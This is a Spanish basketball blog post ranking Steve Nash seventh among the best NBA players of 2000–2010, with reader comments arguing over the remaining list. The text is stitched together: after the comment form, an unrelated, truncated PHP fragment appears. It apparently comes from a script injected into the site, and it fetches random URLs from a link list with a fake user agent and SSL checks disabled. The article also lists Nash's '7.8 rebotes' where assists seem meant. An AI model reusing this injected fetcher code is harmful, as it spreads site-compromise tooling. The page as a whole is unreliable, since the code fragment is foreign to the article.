Los 10 mejores de la década: Nº07

25 de September de 2010 por Viva_Dirk
Artículo 4 de 10 de la serie Los mejores de la década

7.- STEVE NASH

Cada uno de estos jugadores tiene sus características y sus motivos para aparecer en esta lista. En el caso de Steve Nash los méritos individuales son tan poderosos que se trata del único que no ha disputado una final de la NBA. Es obligatorio hablar de él y hacerlo en 2 etapas: una primera con los Mavs de gran nivel aunque insuficiente para ser recordado, y una segunda en Phoenix brillante, estimulante para el espectador y que le ha convertido en uno de los mejores bases de la historia de la liga.

Durante los 4 primeros años del siglo Nash disputó 312 partidos con Dallas (de 328 posibles), con un balance de 232 victorias y 96 derrotas, 4 apariciones en play-offs con un balance de 19-24 y dos apariciones en el All-Star. Nadie dudaba de su calidad y era un jugador al que muchos preferían por encima de otros con mejores números gracias a un estilo de juego generoso y vistoso. Pero todas estas virtudes parecían transformarse en los defectos de unos Mavs que no encontraban el camino del éxito y que tuvieron su momento en la temporada 02-03, donde una inoportuna lesión de Nowitzki dejó sin premio una campaña de 60 victorias. Sus números en estas 4 campañas fueron de 16.5 puntos y 7.8 rebotes. Era un jugador que molaba pero al que nadie habría confiado el futuro de su franquicia….o casi nadie.

En el verano de 2004 los Suns ofrecían al base canadiense un contrato multianual de más de 10 millones por temporada, algo que parecía desproporcionado ya que Nash había entrado en la treientena y su rendimiento no era el de una superestrella. Pero el mundo se equivocaba y los Suns ganaron 62 partidos con el baloncesto más ofensivo de la competición, lo que dio a Steve Nash el MVP más inesperado de la historia y a los Suns una final de conferencia en la que fueron derrotados por San Antonio de tal modo que no podemos pensar que el resultado de la eliminatoria hubiese cambiado con Joe Johnson sano.

La siguiente campaña fue una demostración de la influencia de Nash sobre un grupo de jugadores medios. Con la marcha de Joe Johnson a los Hawks y Amare lesionado durante todo el año, los Suns lograron 54 victorias y otra final de conferencia con Nash rodeado de Bell, Diaw, Barbosa, Tim Thomas,y un Shawn Marion que aún sueña con aquella temporada. En esa ocasión fueron ‘sus’ Mavs los que les apearon de los play-offs. Nash consiguió su segundo MVP consecutivo entrando a formar parte de un selectisimo grupo repletos de jugadores del hall of fame.

Los siguientes 3 años transcurrieron de forma casi idéntica, con muy buenas regular seasons y derrotas en play-offs. A los Suns empezó a rodearles un aura de ‘jugones pero perdedores’. En ese tiempo se rompió el “Run & Gun” debido al ‘efecto Gasol’ que llevó a Shaquille O’Neal a los Suns, y posteriormente a la marcha de Mike D’Antoni a los Knicks. Parecía haber llegado el final de un ciclo en Phoenix y cada verano se especulaba con una posible bajada de prestaciones de Nash, bajada que todavía estamos esperando.

Y es que la campaña 09-10 fue todo un triunfo en la carrera de Nash, ya que de nuevo llevó a los Suns a una final de conferencia cuando la gran mayoría de los analistas los daba como máximo primera ronda de play-offs. De nuevo con Amare como escudero y Jason Richardson como tercer hombre más reconocible, Steve lideró a un equipo hecho a base de retales hasta donde otros no llegan ni con equipos hechos casi a medida. Convirtió a un Grant Hill de 37 años, al Frye que había jugado 10 minutos en los Blazers, a un Barbosa renqueante todo el año y 4 jóvenes sin ningún nombre en la liga en un equipo capaz de barrer a San Antonio y hacer sudar a los Lakers de Kobe&Gasol.

Y es que aunque es innegable que la carrera de este fenómeno está llena de grandes derrotas, no es menos cierto que también abundan las pequeñas victorias, y no solo en el marcador sinó también  en nuestros corazones. Comprobar al revisar sus estadísticas que es el líder en asistencias de la década, que sus porcentajes de acierto son los de un pívot y que su acierto desde más allá de  los 7,25m también es el mayor de los últimos diez años, sirve para que el mundo sepa ‘queé ha hecho este hombre, pero los que hemos visto el ‘cómo’ lo ha hecho llevamos dentro un tesoro que nada tiene que ver con el resultado final.

Comenta

16 comentarios a esta entrada

  1. portu dice:
    #1

    Buah, canela fina!!! no podía falta por aquí Steve Nash, y aunque me alegro q se de mucha importancia a los logros colectivos, el anillo no debe ser lo único valorable (de otras épocas quedan muchos grandes jugadores tocados por esa falta de anillo y son reconocidos como auténticos Hall of Fame), así q bienvenido Nash, para mi el mejor base de los últimos años, por encima de Kidd, Payton o Billups, particularmente lo pongo al nivel de Stockton e Isiah Thomas.

      Citar

  2. Jabho dice:
    #2

    Tengo dos camisetas de la NBA, una de los Celtics y otra de Nash 😉

    Merecidísimo!!!!!

    Me ha encantado la frase : “Steve lideró a un equipo hecho a base de retales hasta donde otros no llegan ni con equipos hechos casi a medida”

      Citar

  3. HeiNeKeN dice:
    #3

    Me encanta este hombre, probablemente pasara a formar parte de ese club de grandisimos jugadores sin anillo.

      Citar

  4. Love Denise dice:
    #4

    Yo pondria a Nash mas para arriba, en un top 5 seguro, inclusive en un top 3. Supongo que estará el 7 por no haber ganado ningun anillo, al margen de la dificultad que entraña el comparar a grandisimos jugadores y que no juegan en las mismas posiciones.

      Citar

  5. Txusma dice:
    #5

    En esta década sólo ha habido 3 jugadores que han ganado 2 MVP. Seguro que los vemos en la lista a los 3. Siguiendo el razonamiento me da que va a ser Jason Kidd el que salga de la lista.
    Grande entre grandes Steve Nash, aunque no sea bendecido con el anillo.

      Citar

  6. aro_pasado_no_newtoniano dice:
    #6

    Enorme nash. Que se mueran los feos!!!!!!!!

      Citar

  7. Love Denise dice:
    #7

    @txusma. : No creo que Kidd esté en esta lista, supongo que los 6 que quedan serán Nowitzki, Garnett, James, Duncan, Shaq y Kobe (por este orden del 6 al 1).

    Alguien sabe si algun canal español (en abierto) emite los partidos de Lakers contra Wolves en Londres el 4 de octubre y contra el Barça el 7?

      Citar

  8. Txusma dice:
    #8

    Es lo que decía Love, que Kidd es muy posible que se caiga de la lista sobretodo pq no cuenta con un MVP en su haber.

      Citar

  9. sergio dice:
    #9

    James??? Antes que Iverson?? Espero que no….

    De todas formas creo que uno de los dos será el gran olvidado de la lista junto a Kidd.

    Aunque quien sabe… saldrá de la lista Nowitzki? Hagan sus apuestas!

      Citar

  10. Txusma dice:
    #10

    Mira que yo defiendo a Iverson más de una vez pero no acabo de ver pq su década ha de ser mejor que la Lebron James…

      Citar

  11. MagicJohnson32 dice:
    #11

    La clave en cuanto a Nash es lo que se comenta al final del artículo: el “cómo” por encima del “qué”.

    Somos afortunados por haber podido disfrutar de los años dorados de este pedazo de jugador, además de ser un tipo elegante, amable, discreto… pero ante todo, un súperclase. Eterno Nash.

      Citar

  12. sergio dice:
    #12

    Txusma, para mi los dos merecen estar en la lista, pero considero más merecida la entrada de Iverson desde un punto de vista personal. Es más, considero que lo mejor de LeBron James está por llegar y ya tendrá el reconocimiento que se merece en su momento. De los jóvenes que actualmente están dominando la Liga, sólo creo que Wade puede entrar por la consecución del anillo y su juego durante esos Playoffs en general, y en las Finales en particular. La repercusión y las estadísticas de James aun no se han reflejado en una superioridad de su equipo sobre el resto. Karl Malone o Charles Barkley son otros dos jugadores que han tenido una valoración similar estadística durante algunas temporadas y no por eso se convirtieron en ganadores. No por eso se les deja de considerar entre los mejores de la historia en su puesto. Demosle tiempo y nos callará la boca. Iverson nos la calló durante mucho tiempo a base de testiculina y liderazgo

      Citar

  13. Txusma dice:
    #13

    Que lo mejor esté por llegar creo que no es argumento para no valorar lo que ya ha conseguido Lebron. Uno tiene 2 MVP, el otro 1. Los 2 han llegado a una final de la NBA. Uno está en el cénit de su carrera, el otro lleva 2 años rozando el ridículo. Uno ha disputado más del 90% de partidos, el otro unos cuantos menos. Uno promedia 7 asistencias por encuentro siendo alero, el otro no llega siendo teóricamente un base… A Iverson le valoro muchas cosas pero por encima de Lebron James en esta década no lo coloco de ninguna de las maneras.

      Citar

  14. sergio dice:
    #14

    A mi si me parece un argumento… pero comprendo perfectamente que no lo sea para ti.

    Los dos MVP’s de LeBron han venido con plantillas mejores de las que ha tenido nunca Iverson. Mucha gente roza el ridículo en los ultimos años de su carrera. Iverson creo ha liderado en minutos por partido 7 temporadas (y seguro que es un top 5 historico en minutos por partido). Ha liderado la liga 3 veces en robos (top 10 historico), 4 en anotacion (top 10 quizas tambien), tIene una media de 6,2 asistencias por partido,… y todo eso con todos los altibajos que ha sufrido en su carrera. Soy partidario de revisar la importancia de los jugadores tras su retirada o cuando esta próxima. Por hacerte un simil deportivo, no podemos considerar a Nadal como uno de los mejores de la historia cuando puede llegar a ser el más grande.

    Pero vamos,.. que está claro q no todos pensamos igual y que aquí caben los distintos puntos de vista.

      Citar

  15. Txusma dice:
    #15

    Ya te digo que en el debate Iverson si-Iverson no, yo estoy del lado del sí, pero aunque estoy de acuerdo contigo en que los jugadores no se pueden valorar hasta el final de las carreras no estoy de acuerdo en que no podamos valorar a todos los jugadores en un determinado espacio de tiempo. Hablamos del mejor de la década (2000-2010) y eso es cuantificable para todos los jugadores, ya sean jóvenes, veteranos o retirados. Evidentemente el caso de Iverson puede ser algo injusto pq sus primeros años en la liga fueron en la anterior década.

      Citar

  16. sergio dice:
    #16

    Aun midiendo el impacto de los jugadores durante este periodo de 10 años, pienso que Iverson esta, al menos, a la altura de James. Quizas el impacto que tuvo uno en los 5 primeros años es bastante similar al de James en la 2ª parte de la decada. Uno de los dos será el gran olvidado de la lista.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>